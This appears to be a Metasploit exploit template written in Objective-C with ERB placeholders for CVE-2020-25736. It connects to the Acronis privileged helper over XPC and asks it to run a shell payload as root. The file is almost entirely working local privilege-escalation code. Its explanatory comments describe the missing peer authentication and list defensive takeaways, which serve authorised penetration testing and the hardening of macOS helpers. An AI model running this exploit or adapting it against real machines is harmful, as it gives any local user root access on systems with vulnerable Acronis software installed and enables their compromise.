rapid7/metasploit-framework

data/exploits/CVE-2020-25736/acronis-exp.erb

#import <Foundation/Foundation.h>

// Client-side mirror of the selectors exposed by the Acronis privileged helper's
// XPC service (the CVE-2020-25736 target). Only the message shapes are declared
// here; the implementation lives inside the helper. The arg1..argN parameter
// names are generic (as produced by dumping the interface), so what each one
// means is inferred only from how main() below uses it.
@protocol HelperToolProtocol
// Reply carries whether the helper believes it has Full Disk Access.
// Not used by main() in this file.
- (void)checkFullDiskAccessWithReply:(void (^)(BOOL))arg1;
// Asks the helper to launch the executable at arg1 with argv arg2. arg3 is a
// "caller" pid that the connecting client supplies itself, so the helper cannot
// rely on it to authorize the request; only a check on the XPC peer (for example
// a code-signing requirement) could do that. Reply carries an int status.
- (void)executeProcess:(NSString *)arg1 arguments:(NSArray *)arg2 caller:(int)arg3 withReply:(void (^)(int))arg4;
// Reply carries a pid reported by the helper. Not used by main() in this file.
- (void)getProcessIdentifierWithReply:(void (^)(int))arg1;
@end


// Entry point of the exploit template. The <%= ... %> tags are ERB placeholders
// that Metasploit fills in before this file is compiled, so the source as seen
// here is not valid Objective-C on its own. The program connects to the Acronis
// privileged helper over XPC and asks it to run the payload through a shell.
// The weakness being demonstrated is on the helper side: it accepts the
// connection and the executeProcess: request without verifying who the peer is,
// so any local user can have it spawn a process with the helper's privileges.
// Defensive takeaways: the helper's listener:shouldAcceptNewConnection: should
// reject peers that do not satisfy a code-signing requirement, and a privileged
// helper launching a shell is worth alerting on.
int main(int argc, char *argv[])
{
    NSString *service_name;
    // Path of the payload the helper will be asked to run; injected by the module.
    NSString *payload = @"<%= @payload_path %>";
    // argv handed to the shell: <shell> -c <payload_path>.
    NSArray *arg_array = @[@"-c", payload];
    NSFileManager *file_manager = [NSFileManager defaultManager];

    // The helper was renamed between product versions; both candidates live in
    // /Library/PrivilegedHelperTools, the standard location for root-privileged
    // launchd helpers on macOS. The Mach service name matches the binary name.
    NSString *service_name_2020 = @"com.acronis.trueimagehelper";
    NSString *service_name_2021 = @"com.acronis.helpertool";
    NSString *helper_path_2020 = [NSString stringWithFormat:@"/Library/PrivilegedHelperTools/%@", service_name_2020];
    NSString *helper_path_2021 = [NSString stringWithFormat:@"/Library/PrivilegedHelperTools/%@", service_name_2021];

    // Pick whichever helper is installed. Only the 2020 path is checked; the
    // 2021 name is used as the fallback without verifying helper_path_2021, so
    // when neither helper exists the connection below just fails silently.
    if ([file_manager fileExistsAtPath:helper_path_2020])
    {
        service_name = service_name_2020;
    }
    else
    {
        service_name = service_name_2021;
    }

    // 0x1000 is NSXPCConnectionPrivileged: look the Mach service up in the
    // system (root) launchd domain rather than the user's session domain.
    NSXPCConnection *connection = [[NSXPCConnection alloc] initWithMachServiceName:service_name options:0x1000];
    NSXPCInterface *interface = [NSXPCInterface interfaceWithProtocol:@protocol(HelperToolProtocol)];
    [connection setRemoteObjectInterface:interface];

    [connection resume];

    // Connection errors (helper missing, connection invalidated) are deliberately
    // swallowed; the program gives no feedback on failure.
    id obj = [connection remoteObjectProxyWithErrorHandler:^(NSError *error)
    {
        return;
    }];

    // The helper receives a shell (sys_shell is filled in by the module, presumably
    // a /bin/sh-style path), the "-c <payload>" argv built above, and a pid chosen
    // by the client. Because the helper does not authenticate the peer, this
    // single message is the whole privilege escalation. The reply block ignores
    // the status and main() does not wait for it, so the call is fire-and-forget.
    [obj executeProcess:@"<%= sys_shell %>" arguments:arg_array caller:<%= @pid %> withReply:^(int arg)
    {
        return;
    }];
}